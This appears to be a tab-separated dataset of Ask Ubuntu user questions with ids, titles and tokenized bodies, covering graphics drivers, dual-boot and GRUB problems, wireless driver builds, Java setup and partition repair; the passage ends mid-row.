323848	using video card on a headless server	i have a headless server using a core i5 , so it has built-in hd3000 graphics . i have a website which renders videos using opengl , and i 'd like to be able to use the graphics hardware on the server to do this ( it 's too slow using the mesa software renderer ) . however , when using the 'intel ' driver in xorg.conf , i get the following in xorg.0.log : ( ii ) intel : driver for intel integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 , clarkdale , arrandale ( ii ) primary device is : pci 00 @ 00:02:0 ( ee ) no devices detected . fatal server error : no screens found this is n't entirely surprising - no screens actually are connected . but how can i get x11 to run using the hd3000 , even if no screens are connected ? on nvidia hardware i 've found i can use 'option `` connectedmonitor '' `` crt '' ' but this does n't appear to work for the intel driver . the server is in a server farm , so ideally i would n't have to plug anything into it to fool it into thinking something was there . does anyone have any ideas ? ( i 'm actually running ubuntu 10.04 , but i do n't believe this should be the problem ) thanks !
323849	how to set screen contrast using ubuntu 12.04 on macbook pro ?	i have a macbook pro running ubuntu 12.04 lts . it works fine with all the required packages . the only thing i see which is weird is colors are way too light . i think this is contrast ratio which i need to set . how can i adjust contrast ratio on ubuntu ? sudo lshw -c video gives following output . *-display description : vga compatible controller product : nvidia corporation vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:04:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi vga_controller bus_master cap_list rom configuration : driver=nouveau latency=0 resources : irq:16 memory : d2000000-d2ffffff memory : c0000000-cfffffff memory : d0000000-d1ffffff ioport:1000 ( size=128 ) memory : d3000000-d301ffff
323850	linux distro advice	i 'd like you to help me in choice of best linux distro for a netbook aceraspireone d255 with 1gb ram ( physically increased to 1.5 ) ... i 've tried linux mint 10 , but it has n't any support ( for instance , no access to the app manager ) i 've tried xubuntu 13.04 but it freezes it got to be a simple and easy to use one , though it will be installed on my father 's pc but no problem for any installation type ( graphic or key ) for that i 'm doing it myself . thank you for your advices
323852	please help me fix my ubuntu installation and the bootloader issues	my situation is the following i have no linux experience . i have a hard disk with two partitions . one used to have windows 7 on it , the other one was recently formatted in preparation for an ubuntu install . i made an ubuntu live cd and tried to install it to the empty partition . i also took the opportunity to format the windows partition in preparation for reinstalling windows 7 afterwards . the ubuntu installation reported a fatal grub error and also tells me that the bootloader could not be installed . when trying to install windows 7 , the installation now also fails due to some nondescript partitioning related error . my computer has effectively become unusable . thankfully livecd lets me try out ubuntu . i have used the gparted partition editor to wipe the drive clean . how should i set up the partitions so that i can properly install both os ? once this is done , how do i fix the grub/bootloader problem ?
323854	replace windows 8 with windows 7	yesterday , i got my windows 8 bsod on boot ( reboot repeatedly ) for `` system thread exception not handled '' so i ca n't do anything thus i installed ubuntu 12.04. still , i prefer windows for compatibilities sake ... but now i want to replace the windows 8 with windows 7 64bit ultimate . so , how to remove the windows 8 from my laptop using ubuntu because i still ca n't access windows 8 directly ( still bsod ) and install windows 7 then ?
323856	error while installing ubuntu 12.10	i 'm trying to install ubuntu 12.10 on a netbook via usb . i 've created an usb image with the gtk utility that comes with ubuntu . when i try to boot it up , it shows an error message : error : no configuration file found no default or ui configuration directive found ! and a prompt that says boot : can you help me ?
323865	ubuntu fails to boot on a dualboot system	i started up ubuntu and everything went fine till it locked up , so i restarted the tower , and upon reboot , i selected ubuntu from window 's bootloader , but the boot failed with an error message and refused to boot ubuntu but opened grub . i clicked the tab entered boot and it said kernel is missing .
323868	how do i install a ftp server ?	how to configure ftp server in my ubuntu 12.04 or 13.04.what to install and how to configure .
323871	customize xdg-open to open home page without url	is it possible to somehow use the xdg-open command to open my home page ( google.com ) without having to type the url . what i mean to say is , can i customize xdg-open http : //www.google.com to something like : xdg-open myhome to open it ?
323876	how to connect webcamstudio output to the vlc player ( as an input )	i am a videographer and occupational therapist . i am willing to webcast of patients leissure activities ( drama , music ect ) to improve their health . in order to do this i want to have a good rtmp streamer . only such streamer i found with ubuntu is vlc media player . but its capacity to edit a live video is less . webcamstudio is sufficient . but it can not stream rtmp stream . so i need your help to connect webcamstudio with vlc or stream rtmp with webcamstudio . thanks .
323879	logitech g15 keyboard ( with lcd ) tools	i am still using my old `` gaming '' keyboard logitech g15 ( i 'm not playing games ) since before i 've migrated to ubuntu . this keyboard has a driver support only for win and mac os , as you can see in this picture . now i am using this keyboard just as a any ordinary keyboard + 2 extra usb sockets + media buttons + back-lighted keys and a lcd witch shows only logitech logo.. what i am missing is the applets to show some info on the lcd & 3x18 quick-macro programmable extra keys . nearly two years ago have been raised a question what gaming keyboard ( s ) will work with ubuntu ? , where i found a link to see something about a tool called g15tool . but it looks like the link is dead . another link to a similar functionality tool is dead too . i heard about sidewinder x6 macrokeys on gnu/linux , but not sure if its going to work well on my asus a8j with ubuntu 12.10 ... or is there any precautions i should be aware ? as the post and the links provided with it is kind a old , maybe there is another newer tool for the macro keys and/or lcd ? perhaps there is a way to program extra keys within the ubuntu ( gnome ) ? i just want to be sure about what i am doing , before taking the steps..
323881	ask location every time a download takes place	i am using ubuntu for almost a year now and i want to ask a small question here.. you may think that this is a stupid question but i am asking it here because i have n't got any solution for this problem.. i have installed ubuntu 12.04 on my desktop . my problem is whenever i download anything on my system ( i usually use firefox and transmission client for downloading purposes ) it automatically gets saved in `` download '' folder but i do n't like this mess.i want my ubuntu to ask me for the location of download every time i download anything , so that everything is in its proper place..but i do n't know how to do this..i do n't want to use any download manager because it will create its own folders and will again mess up the things.. so please help me out guys ! ! thanks in advanced ! !
323887	how can i make a symbolic link to run a program with command line argument ?	how can i make a symbolic link to run a program with command line argument ? for example , i want to run sample with -i eth0 argument every time when i click on a symbol link .
323890	how to install cocos2dx on ubuntu 13.04 ?	i have ubuntu 13.04 on my laptop . i need to install cocos2dx on it . does any one know how to install it ? please explain how to install .
323891	installing themes - lubuntu ?	how to install themes in lubuntu distro ? ? please guide me to install this theme any help would be appreciated .
323894	system password in lubuntu 13.04	when i reboot my computer lubuntu prompts me for a password , it 's just after the motherboard prefrences and there are no username options , just system password , i input sudo password and it 's ok , but it 's kinda annoying , i want lubuntu to autologin , i have removed the option that lubuntu asks me password at login , in users and groups preferences , if i would have checked that , i would have to input my password twice.. so , how do i get rid of that `` boot '' password.. it 's a blueish screen , with a huge lubuntu logo , and just a password field..
323898	install ubuntu on efi machine with windows 8 preinstalled ( possibly remove windows 8 )	i read alvarado 's tutorial on how to install ubuntu on an efi machine with preinstalled windows 8 from installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) . that 's a nice and detailed explanation . i am about to use it . however i would like to ask some questions . before doing this , let me describe my situation and my aims . i have an asus laptop n76v with an efi bios and a preinstalled windows 8 . i could disable fast boot ( in the bios and within windows 8 ) and secure boot . it seems that i can not disable efi but i could launch a csm option . windows still starts up correctly . i have two sata drives with size 750gb each . from the partition manager in windows 8 , i see the following : drive 0 : efi system partition , 300 mb recover partition , 600 mb primary partition with os ( c : ) , ntfs , 372,6 gb ( contains windows 8 ) primary partition ( d : ) , ntfs , 537,89 gb ( for data ) recover partition , 20,01 gb drive 1 : primary partition ( e : ) , ntfs , 465,75 gb ( for data ) primary partition ( f : ) , ntfs , 465,76 gb ( for data ) first aim : install ubuntu 12.04.2 ( and maybe another linux system ) on the drive 1 and conserve windows 8 . second aim : install ubuntu 12.04.2 ( and maybe another linux system ) on the drive 1 , remove windows 8 and install another linux system on the drive 0 . for the first aim , i could follow your advices . however i want to be sure i understood correctly . when he wrote , one should partition within windows 8 , it means that one should create for instance an ext3 partition for / , a swap partition , and an ext3 partition for /home using the partition manager in windows ? then , when installing ubuntu , choose manual partitioning , just attribute the mount point to each relevant partitions and do not format them . is that correct ? where should i put the boot loader ( grub ) for ubuntu ? at the beginning of the partition / ? in fact , i do not really want conserve windows 8 . i would prefer to erase it at the right time and to be able to partition the drives and to install several linux systems ( this is aim 2 ) . has anyone have hints or a reference to a tutorial for this ?
323900	13.04 install stops after splash screen - ata7:00 : failed command : identify packet device	i have repeatedly tried to install 13.04 on my minitower to no avail . the installation invariably stops with a totally black screen - or frozen cursor on a black screen - after the splash screen . first , i thought it was an uefi problem , but it did n't get better after disabling uefi . second , i figured it must be a problem with the graphics card , but the installation still stalled after when using nomodset , and also the acpi = off and nolapic . i have basically tried everything in these articles : uefi and my computer boots to a black screen , what options do i have to fix it ? . moreover , i have checked disks and memory and found no faults , and the bios has been upgraded to the latest version . both cd and usb booting has been tried . could it be that installing 13.04 on this pc is actually impossible ? note : this pc already got win 7 on it , but i want to erase that and replace it with ubuntu . in other words ; i am not looking to dual boot . spec : asrock x79 xtreme6 p2.20 motherboard with intel i7-3820 , no overclocking , 16 gb memory , amd hd 6870 graphics card .
323905	how to set up centralized management entity to control hostapd access points	we are working on a project to provide wifi at our university . due to financial limits , we are planning to install multiple linux based access points ( wlan modules running with hostapd ) . but at the moment we are confused to proceed that : is there any way to impliment ubuntu based wireless lan controller for centralized management of such access points ? though , the capwap protocol has been standardized by ietf for the communication between access points and wlan controler but `` does hostapd support capwap/lwapp or not ? '' please help us in this regard ,
323906	i have a microsoft wireless mouse . can i somehow see the battery status ?	is there a software that can do that ? i searched through the internet and could n't find a thing .
323909	does the sleep and charge feature of usb 3.0 in samsung 5 laptop work with ubuntu 12.10 ?	i am using samsung series 5 np550pc s03in which comes with windows 8 preinstalled . i would like to dual boot windows 8 and ubuntu 12.10 . i have had searched many websites but there is no information whether dual boot with ubuntu 12.10 breaks usb ( usb 3.0 ) sleep and charge feature . windows 8 supports usb sleep and charge as a default and i use this feature for charging my mobile device while traveling . can anyone confirm this ?
323911	software minetest problem	all the software in the center are on their older virsions and the update software does n't detect the programmer . i want to play minetest 0.4.6 but the one in the software scenter is 0.3.1 if i try to download the 0.4.6 from the internet , the software center does n't aloww me to install it . and i have the newest ubuntu ( 13.4 ) please update it
323916	are openid logins compromised with the ubuntu forums breach ?	i honestly ca n't remember what i used to login to ubuntu forums , but i am quite sure it was openid . should i be concerned ?
323922	realtek wireless not functioning on toshiba after installing 12.04	so like many users with a realtek wireless driver i 've been having problems getting my wireless to work i 'm on a toshiba satellite c875 my wifi adapter is rtl8188ce 802.11b/g/n and my kernal is 3.5.0-36-generic . i managed to find a post on this site with almost my exact problem and a solution , newly installed ubuntu on laptop , wireless will not fuction , however , just like the poster i 'm running into issues at the compiling phase . i 've managed to work through a few issues that the poster had . gcc : error : /lib/modules/3.2.0-34-generic-pae/build/include/linux/autoconf.h : no such file or directory gcc : fatal error : no input files this was caused because autoconf.h is now in a different folder ( include/generated ) . i just had to make a copy of it in the include/linux folder and it got further . same fix worked for modversions.h , which i found in the include/config folder . after that though my problems with compiling look remarkably similar . anyone have any suggestions on how to move forward from here . this is the section of the solution where i 'm having issues cd rtl8192ce_*/ make clean make sudo make install exit reboot after i type in make clean i get this make [ 1 ] : entering directory `/home/aktd/rtl8192ce_linux_2.6.0006.0321.20/hal/rtl8192' rm -fr *.mod.c *.mod *.o . *.cmd *.ko *~ rm -fr .tmp_versions rm -fr modules.symvers rm -fr module.symvers rm -fr module.markers rm -fr modules.order rm -fr tags make [ 2 ] : entering directory `/' make [ 2 ] : *** no rule to make target `clean ' . stop . make [ 2 ] : leaving directory `/' make [ 1 ] : *** [ clean ] error 2 make [ 1 ] : leaving directory `/home/aktd/rtl8192ce_linux_2.6.0006.0321.201/hal/rtl8192' make : *** [ clean ] error 2 i feel like i 'm so close here , but i just ca n't quite get it . oh and i do have linux-headers-3.5.0-36-generic installed before anyone suggests fixing that , as i 've seen that come up a lot as a possible solution on forums .
323924	ubuntu shows recorded dvd as blank	i recorded a music dvd in dvd player . the dvd is working well , but now i ca n't see the contents of the dvd on ubuntu , it shows it as blank dvd . any idea how i can view the files ?
323926	is pledging the only way to get the edge ?	i was watching one of the videos and i think i worked out that the only way to get an edge is if you pledge . can someone tell me if i have misunderstood ?
323929	something that should seem simple	as mentioned in the title , this should be something simple , but for the life of me i ca n't get it to work right . i am writing a small executable script that will take care of entering the ever-so-needed interpreter location for the first line of a script and opening the new script for editing . alright , cool ... done : printf `` # ! % s '' $ ( which bash ) > $ 1 ; vim $ 1 . simple enough . where the problem , only perceived as a problem because i am curious as to how to do it and am not achieving it , is having the script automatically start me off on line 2 in insert mode . this way i am on an empty line , ready to go ... without wasting the .5 seconds or so to press 'o ' ( i am using vim as my text editor for reference ) . so i guess my question is how do i get my automated script to simulate pressing 'o ' when the newly created script opens up with the output of ' # ! $ ( which bash ) ' on the first line ? things tried : using newline character escaped with printf : printf `` # ! % s\n '' $ ( which bash ) > $ 1 using echo with newline character flag : echo -e `` # ! $ ( which bash ) \n '' > $ 1
323936	disable unity launcher on alt + f2	i 've added custom shortcut on alt + f2 , but unity launcher is running when i press it . how do i disable it in 13.04 . i 've found this question but i do n't have 'unityshell ' under apps > compiz-1 > plugins screenshot :
323941	hardware not suitable for 12.04	i want to upgrade to 12.04 but the system tells me my graphics card wo n't run it . is there a way of getting round this , or do i need to look for a different distribution ( a hardware upgrade is not a financially viable option ) .
323943	i messed up my terminal . is there a way to return it to default ?	what i mean by messing up is i put on preferences a repetitive command when starting terminal saying to start terminal . so now it just starts again and again and i can not go to preferences to delete the command . i tried purging and reinstalling but it did n't work .
323944	convert webm to other formats	i take photos and videos using cheese on ubuntu 12.04 . they are in webm formats . how to convert them in other more conventional formats for making them compatible with other os and devices ( windows , mobiles etc ) ? i am looking for an easy tool since i do n't need to process my files further . thanks for the reply .
323946	ubuntu failes to recognize java	i 've been having an issue with java since i installed ubuntu and it has been the main reason i have stopped playing certain java-based games such as minecraft . you see , although i 've downloaded openjdk 6 from the software center , ubuntu refuses to recognize that i do in fact have it installed . when i type java -version into the terminal , the following pops up : the program 'java ' can be found in the following packages : * default-jre * gcj-4.6-jre-headless * gcj-4.7-jre-headless * openjdk-7-jre-headless * openjdk-6-jre-headless try : sudo apt-get install < selected package > giving it the benefit of the doubt , i tried installing these as well . unfortunately , java -version continues to present me this same exact message every time . also , just to make sure the terminal was n't drunk , i checked minecraft.jar > properties > open with and openjdk 6 was , unsurprisingly , not available from the list . edit : here are the results of dpkg -l | grep jdk : ii openjdk-6-jre : i386 6b27-1.12.6-1ubuntu0.12.10.2 i386 openjdk java runtime , using hotspot jit ii openjdk-6-jre-headless : i386 6b27-1.12.6-1ubuntu0.12.10.2 i386 openjdk java runtime , using hotspot jit ( headless ) ii openjdk-6-jre-lib 6b27-1.12.6-1ubuntu0.12.10.2 all openjdk java runtime ( architecture independent libraries ) ii openjdk-7-jre : i386 7u21-2.3.9-0ubuntu0.12.10.1 i386 openjdk java runtime , using hotspot jit ii openjdk-7-jre-headless : i386 7u21-2.3.9-0ubuntu0.12.10.1 i386 openjdk java runtime , using hotspot jit ( headless ) ii openjdk-7-jre-lib 7u21-2.3.9-0ubuntu0.12.10.1 all openjdk java runtime ( architecture independent libraries )
323950	ubuntu forums password .	i was wondering if anyone could tell me the format of the passwords for ubuntu forums . i am a member but have n't been online for quite a while and have forgotten which of my passwords i have used . if i know the minimum length and if it requires capitals or symbols , i should be able to remember . obviously i am in a hurry to secure my other accounts with the recent breach .
323962	how to make desktop icons ?	this is n't really a big deal or anything , i was just curios if it was possible to make an alias/shortcut for apps and move them to the desktop for easy access ? i know you can pin them to the launcher , but i did n't know whether or not you could place them directly to the desktop . i like to keep my ubuntu and my osx extra organized so there 's not a lot of stuff i keep on the desktop , but some stuff i just like easy access to . thanks !
323963	network adapter suddenly stopped working under ubuntu 12.10	i 'm using ubuntu 12.10 and the network adapter suddenly stopped working . running ifconfig , the eth0 information is not shown anymore as before ( only the lo information is shown ) . running lspci , the controller is recognized as shown in the following line : 00:19.0 ethernet controller : intel corporation 82567v-2 gigabit network connection the network adapter is the one that comes onboard , i have an asus rampage iii extreme motherboard . trying to get internet from somewhere , i plugged a pci wireless card in the motherboard and it was recognized by ubuntu , so i had internet , but after using it for 10 minutes , the connection went down and now it does n't recognize any wireless networks ( it says wireless : unavailable ) , so i can not connect either wired or wireless . i have tried flashing the bios to a newer version and a bunch of different solutions i read in forums but still with no luck . the strange thing is that if i boot with windows 7 ( i have double boot with grub ) , both cards are correctly recognized and i can have internet wired and wireless , so a hardware problem is discarded . any ideas ? this happened out of the blue for me , because i had n't made any system updates nor installed any new software when the network adapter went down . edit : booting with ubuntu cd does n't solve the problem either.. i still have the same problem mentioned above
323966	what is the best version of ubuntu for an aging ibm t60 laptop ?	what is the best version/distro of ubuntu for an aging ibm thinkpad t60 laptop ?
323967	make custom shortcut on alt+f2	i 'm using 13.04 . i want to make gmrun run when i press alt + f2 . i 've already made alt + f2 disabled i add custom shortcut in all-settings/keyboard/shortcuts everything works fine . i reboot and the shortcut does n't work ( nothing happens ) . i click on alt+f2 , press alt+f2 and the shortcut works again i 've tested it with few key combinations . alt+f2 , alt+f6 , alt+p - situation as described above . menu , ctrl+f2 - works fine the question is how to make shortcut on alt+f2 permanent
323976	building apps in ubuntu	i use a program in windows , but for some reason , i desperately need the program to be running in ubuntu . i have downloaded the source code , but did n't know what to do next . i contacted the developer and he said that `` you must rebuild it from sources and ask google about building qt apps '' . how to develop using qt ? version : ubuntu 12.04 lts
323980	usr/bin/x11 replication is eating up space , how do i correct this ?	the replication of /usr/bin/x11 is eating up disk space . how do i correct this ? i 'm running ubuntu 12.04 lts on a dell mini9 with a 8gb hd . the file x11 is replicating . every time i open one there is another x11 , each w/1461 items . i gave up looking after 24 occurrences . the file usr is using 3.2gb . i tried installing ubuntu 13.04 , but there not enough space to finish the install .
323982	disable super + s in ubuntu 13.04	i tried this thread but it did n't work . how can i disable super + s which previews workspaces
323993	my ubuntu installation ( triple booting ubuntu 13.04 , winxp and win7 ) made my win7 impossible to boot	i really hope this question is appropriate for this place , since i have absolutely no idea who to ask , or what to do . when i first tried to install ubuntu ( well , second time , but the previous time was irrelevant , i installed and uninstalled it with no problem , i could n't connect to the internet on ubuntu back then due to my very old modem ) , i used a usb flash drive . apparently , there was some kind of a problem in the flash drive , and the installation did n't complete . it stopped halfway through every time i tried it . ever since i half-installed it , every time i tried to boot windows 7 , it failed to boot . i have no gui boot enabled , so the only indication of booting is 3 teal dashes in the upper left part of the screen . it starts booting and then suddenly the top of the screen ( where those teal dashes are ) becomes scrambled , like when you move around a cartridge inside an old game console . my windows xp partition works perfectly , and all my files are fine - nothing was lost . when i boot , the first thing that launches is the gnu grub bootloader that gives me options between ubuntu and windows 7 . if i choose windows 7 , it gives me another boot manager ( the one that i used previously to choose between xp and 7 ) . if i choose windows xp ( listed as an `` older version of windows '' ) , everything works fine . if i choose windows 7 , the problem that i mention pops up . it just stays scrambled like that no matter how much i wait . i tried running the repair tools . i ran the startup problem detector and it detected no problems . someone suggested that it might be a problem with grub . any ideas ? thanks . p.s : apologies for not pointing it out , but after the usb installation failed , i managed to install ubuntu successfully using a dvd , and i have been using it for like a month already . i have been in the mood for some games on my win7 partition , so i decided to find a way to restore it ( the win7 itself , the files themselves are fine , as i said ) .
323994	is there an app for keyboard status	i have a brand new laptop , well it 's only 3 weeks old , so nearly brand new . the only problem i find with it is that there is no visual display , light or sound , fitted to tell me whether the caps lock key is on or off . this is packard bell 's way of why i did n't want to buy from them in the past ! ! ! is there any software which would display the status of the caps lock key ? i have searched through the software centre for caps lock , keyboard status and installed keymon but it did n't work . i also asked google to no avail .
324008	how to find out which program uses given keyboard shortcut	i noticed today one of my keyboard shortcuts in vimperator stopped working ( to increment a number in an url ) . i believe it might have been assigned to something else and want to find out what that would be . i tried few places and wanted to : find out if there 's one place where i can see ( hopefully ) all or ( realistically ) at least some programs that rely on shortcuts find out if i missed something in my checks . so far i checked / am checking : - system shortcuts - custom system shortcuts ( am checking now ) - compiz ( want to check next ) shortcut in question is ctrl+a .
324011	do we require any antivirus to be install in ubuntu 13.04	does require antivirus for ubuntu 13.04 , if yes then what is the anti-virus should be install in ubuntu 13.04 .
324014	i ca n't boot without flash drive	i re installed ubuntu 12.04 from a flash drive , it does n't boot without the flash drive . i tried to install the grub in using the command sudo grub-install /dev/sda but it says it can not find the device for /boot/grub and asks if the device is mounted i checked with the disk utility program , the disk is there , its name is sda1 and it is mounted . what could be my next move ?
324022	how do i make a pc .local instead of ip ?	i have this problem at the office . i have 3 pcs that are connected by ethernet cables and one that is n't because that one is connected without a cable , it 's wireless . the weird thing is that all the pcs are detected by a hostname.local , the other one which is the one that is wireless it ca n't be identified , except with just ip . how do i make it get identified and be .local ? can anyone help me display this pc as .local ? wired : ifconfig on wired pc : eth0 link encap : ethernet hwaddr c8:0a : a9:9f:22:8c inet addr:192.168.1.65 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :ca0a : a9ff : fe9f:228c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:458841 errors:0 dropped:0 overruns:0 frame:0 tx packets:297827 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:609175794 ( 609.1 mb ) tx bytes:33497578 ( 33.4 mb ) interrupt:20 memory : fb500000-fb520000 ifconfig on wireless pc : eth1 link encap : ethernet hwaddr 1c:3e:84:14:77:1d inet addr:192.168.1.103 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :1e3e:84ff : fe14:771d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:20252 errors:75 dropped:0 overruns:0 frame:293591 tx packets:20197 errors:24 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:9528535 ( 9.5 mb ) tx bytes:4115883 ( 4.1 mb ) interrupt:17
324025	merging two partitions	i used dd command to write a 8gb pendrive image to a 16gb pen drive . the uploaded image files as below please tell me how to utilize the full 16gb capacity of the target drive ? it is mentioned that it is a duplicate and has been answered at how to merge two partitions ? . but as mentioned there gparted did not solve my problem , as already mentioned by me yesterday and also mentioned that easeus partition master 9.2.2 , did the trick for me . the error reported by gparted is as below : gparted 0.16.1 libparted 3.1 check and repair file system ( fat32 ) on /dev/sdb1 00:00:11 ( error ) calibrate /dev/sdb1 00:00:00 ( success ) path : /dev/sdb1 start : 2048 end : 31948799 size : 31946752 ( 15.23 gib ) check file system on /dev/sdb1 for errors and ( if possible ) fix them 00:00:06 ( success ) dosfsck -a -w -v /dev/sdb1 dosfsck 3.0.16 ( 01 mar 2013 ) dosfsck 3.0.16 , 01 mar 2013 , fat32 , lfn checking we can access the last sector of the filesystem there are differences between boot sector and its backup . differences : ( offset : original/backup ) 1:58/5a , 3:53/4d , 4:59/53 , 5:53/57 , 6:4c/49 , 7:49/4e , 8:4e/34 , 9:55/2e , 10:58/31 , 90 : fa/00 , 91 : fc/00 , 92:31/00 , 93 : c9/00 , 94:8e/00 , 95 : d1/00 , 96 : bc/00 , 97:76/00 , 98:7b/00 , 99:52/00 , 100:06/00 , 101:57/00 , 102:1e/00 , 103:56/00 , 104:8e/00 , 105 : c1/00 , 106 : b1/00 , 107:26/00 , 108 : bf/00 , 109:78/00 , 110:7b/00 , 111 : f3/00 , 112 : a5/00 , 113:8e/00 , 114 : d9/00 , 115 : bb/00 , 116:78/00 , 118:0f/00 , 119 : b4/00 , 120:37/00 , 121:0f/00 , 122 : a0/00 , 123:56/00 , 124:20/00 , 125 : d2/00 , 126:78/00 , 127:1b/00 , 128:31/00 , 129 : c0/00 , 130 : b1/00 , 131:06/00 , 132:89/00 , 133:3f/00 , 134:89/00 , 135:47/00 , 136:02/00 , 137 : f3/00 , 138:64/00 , 139 : a5/00 , 140:8a/00 , 141:0e/00 , 142:18/00 , 143:7c/00 , 144:88/00 , 145:4d/00 , 146 : f8/00 , 147:50/00 , 148:50/00 , 149:50/00 , 150:50/00 , 151 : cd/00 , 152:13/00 , 153 : eb/00 , 154:62/00 , 155:8b/00 , 156:55/00 , 157 : aa/00 , 158:8b/00 , 159:75/00 , 160 : a8/00 , 161 : c1/00 , 162 : ee/00 , 163:04/00 , 164:01/00 , 165 : f2/00 , 166:83/00 , 167 : fa/00 , 168:4f/00 , 169:76/00 , 170:31/00 , 171:81/00 , 172 : fa/00 , 173 : b2/00 , 174:07/00 , 175:73/00 , 176:2b/00 , 177 : f6/00 , 178:45/00 , 179 : b4/00 , 180:7f/00 , 181:75/00 , 182:25/00 , 183:38/00 , 184:4d/00 , 185 : b8/00 , 186:74/00 , 187:20/00 , 188:66/00 , 189:3d/00 , 190:21/00 , 191:47/00 , 192:50/00 , 193:54/00 , 194:75/00 , 195:10/00 , 196:80/00 , 197:7d/00 , 198 : b8/00 , 199 : ed/00 , 200:75/00 , 201:0a/00 , 202:66/00 , 203 : ff/00 , 204:75/00 , 205 : ec/00 , 206:66/00 , 207 : ff/00 , 208:75/00 , 209 : e8/00 , 210 : eb/00 , 211:0f/00 , 212:51/00 , 213:51/00 , 214:66/00 , 215 : ff/00 , 216:75/00 , 217 : bc/00 , 218 : eb/00 , 219:07/00 , 220:51/00 , 221:51/00 , 222:66/00 , 223 : ff/00 , 224:36/00 , 225:1c/00 , 226:7c/00 , 227 : b4/00 , 228:08/00 , 229 : e8/00 , 230 : e9/00 , 232:72/00 , 233:13/00 , 234:20/00 , 235 : e4/00 , 236:75/00 , 237:0f/00 , 238 : c1/00 , 239 : ea/00 , 240:08/00 , 241:42/00 , 242:89/00 , 243:16/00 , 244:1a/00 , 245:7c/00 , 246:83/00 , 247 : e1/00 , 248:3f/00 , 249:89/00 , 250:0e/00 , 251:18/00 , 252:7c/00 , 253 : fb/00 , 254 : bb/00 , 255 : aa/00 , 256:55/00 , 257 : b4/00 , 258:41/00 , 259 : e8/00 , 260 : cb/00 , 262:72/00 , 263:10/00 , 264:81/00 , 265 : fb/00 , 266:55/00 , 267 : aa/00 , 268:75/00 , 269:0a/00 , 270 : f6/00 , 271 : c1/00 , 272:01/00 , 273:74/00 , 274:05/00 , 275 : c6/00 , 276:06/00 , 277:46/00 , 278:7d/00 , 280:66/00 , 281 : b8/00 , 282:4a/00 , 283 : ee/00 , 286:66/00 , 287 : ba/00 , 292 : bb/00 , 294:80/00 , 295 : e8/00 , 296:0e/00 , 298:66/00 , 299:81/00 , 300:3e/00 , 301:1c/00 , 302:80/00 , 303 : f7/00 , 304:73/00 , 305:34/00 , 306:6e/00 , 307:75/00 , 308:74/00 , 309 : e9/00 , 310 : f8/00 , 311:02/00 , 312:66/00 , 313:03/00 , 314:06/00 , 315:60/00 , 316:7b/00 , 317:66/00 , 318:13/00 , 319:16/00 , 320:64/00 , 321:7b/00 , 322 : b9/00 , 323:10/00 , 325 : eb/00 , 326:2b/00 , 327:66/00 , 328:52/00 , 329:66/00 , 330:50/00 , 331:06/00 , 332:53/00 , 333:6a/00 , 334:01/00 , 335:6a/00 , 336:10/00 , 337:89/00 , 338 : e6/00 , 339:66/00 , 340:60/00 , 341 : b4/00 , 342:42/00 , 343 : e8/00 , 344:77/00 , 346:66/00 , 347:61/00 , 348:8d/00 , 349:64/00 , 350:10/00 , 351:72/00 , 352:01/00 , 353 : c3/00 , 354:66/00 , 355:60/00 , 356:31/00 , 357 : c0/00 , 358 : e8/00 , 359:68/00 , 361:66/00 , 362:61/00 , 363 : e2/00 , 364 : da/00 , 365 : c6/00 , 366:06/00 , 367:46/00 , 368:7d/00 , 369:2b/00 , 370:66/00 , 371:60/00 , 372:66/00 , 373:0f/00 , 374 : b7/00 , 375:36/00 , 376:18/00 , 377:7c/00 , 378:66/00 , 379:0f/00 , 380 : b7/00 , 381:3e/00 , 382:1a/00 , 383:7c/00 , 384:66/00 , 385 : f7/00 , 386 : f6/00 , 387:31/00 , 388 : c9/00 , 389:87/00 , 390 : ca/00 , 391:66/00 , 392 : f7/00 , 393 : f7/00 , 394:66/00 , 395:3d/00 , 396 : ff/00 , 397:03/00 , 400:77/00 , 401:17/00 , 402 : c0/00 , 403 : e4/00 , 404:06/00 , 405:41/00 , 406:08/00 , 407 : e1/00 , 408:88/00 , 409 : c5/00 , 410:88/00 , 411 : d6/00 , 412 : b8/00 , 413:01/00 , 414:02/00 , 415 : e8/00 , 416:2f/00 , 418:66/00 , 419:61/00 , 420:72/00 , 421:01/00 , 422 : c3/00 , 423 : e2/00 , 424 : c9/00 , 425:31/00 , 426 : f6/00 , 427:8e/00 , 428 : d6/00 , 429 : bc/00 , 430:68/00 , 431:7b/00 , 432:8e/00 , 433 : de/00 , 434:66/00 , 435:8f/00 , 436:06/00 , 437:78/00 , 439 : be/00 , 440 : da/00 , 441:7d/00 , 442 : ac/00 , 443:20/00 , 444 : c0/00 , 445:74/00 , 446:09/00 , 447 : b4/00 , 448:0e/00 , 449 : bb/00 , 450:07/00 , 452 : cd/00 , 453:10/00 , 454 : eb/00 , 455 : f2/00 , 456:31/00 , 457 : c0/00 , 458 : cd/00 , 459:16/00 , 460 : cd/00 , 461:19/00 , 462 : f4/00 , 463 : eb/00 , 464 : fd/00 , 465:8a/00 , 466:16/00 , 467:74/00 , 468:7b/00 , 469:06/00 , 470 : cd/00 , 471:13/00 , 472:07/00 , 473 : c3/00 , 474:42/00 , 475:6f/00 , 476:6f/00 , 477:74/00 , 478:20/00 , 479:65/00 , 480:72/00 , 481:72/00 , 482:6f/00 , 483:72/00 , 484:0d/00 , 485:0a/00 , 504 : fe/00 , 505:02/00 , 506 : b2/00 , 507:3e/00 , 508:18/00 , 509:37/00 not automatically fixing this . boot sector contents : system id `` syslinux '' media byte 0xf8 ( hard disk ) 512 bytes per logical sector 2048 bytes per cluster 32 reserved sectors first fat starts at byte 16384 ( sector 32 ) 2 fats , 32 bit entries 15604224 bytes per fat ( = 30477 sectors ) root directory start at cluster 2 ( arbitrary size ) data area starts at byte 31224832 ( sector 60986 ) 3901041 data clusters ( 7989331968 